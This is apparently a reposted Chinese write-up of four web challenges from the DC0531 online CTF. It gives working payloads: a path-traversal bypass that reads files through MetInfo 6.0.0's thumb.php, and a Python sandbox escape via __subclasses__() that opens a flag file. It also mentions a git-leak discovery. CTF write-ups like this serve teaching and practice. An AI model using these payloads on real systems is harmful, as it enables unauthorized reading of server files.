DC0531 CTF 线上赛

栏目: 服务器 · 发布时间: 7年前

内容简介:先关注公众号然后发现是个游戏。 测试发现通过分析可知,将武器切换为flag即可

Web1

先关注公众号然后发现是个游戏。 测试发现 s:ip 这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露

DC0531 CTF 线上赛

通过分析可知,将武器切换为flag即可 DC0531 CTF 线上赛

然后一直s我们的vps

DC0531 CTF 线上赛 DC0531 CTF 线上赛

得到base64加密的flag.php文件 PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg 解密即可

Web2

题目存在git泄露 http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/ 根据网上纰漏的文件读取,然后进行bypass得到flag /include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag DC0531 CTF 线上赛

Web3

首先输入 ().__class__.__base__.__subclasses__() 不可用

0x1.__class__.__base__.__subclasses__() 发现可用 DC0531 CTF 线上赛

0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag") 可以读到文件流

但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格

[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]

DC0531 CTF 线上赛

Web4

原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7


以上所述就是小编给大家介绍的《DC0531 CTF 线上赛》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

集体智慧编程

集体智慧编程

TOBY SEGARAN / 莫映、王开福 / 电子工业出版社 / 2009-1 / 59.80元

本书以机器学习与计算统计为主题背景,专门讲述如何挖掘和分析Web上的数据和资源,如何分析用户体验、市场营销、个人品味等诸多信息,并得出有用的结论,通过复杂的算法来从Web网站获取、收集并分析用户的数据和反馈信息,以便创造新的用户价值和商业价值。全书内容翔实,包括协作过滤技术(实现关联产品推荐功能)、集群数据分析(在大规模数据集中发掘相似的数据子集)、搜索引擎核心技术(爬虫、索引、查询引擎、Page......一起来看看 《集体智慧编程》 这本书的介绍吧!

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

SHA 加密
SHA 加密

SHA 加密工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具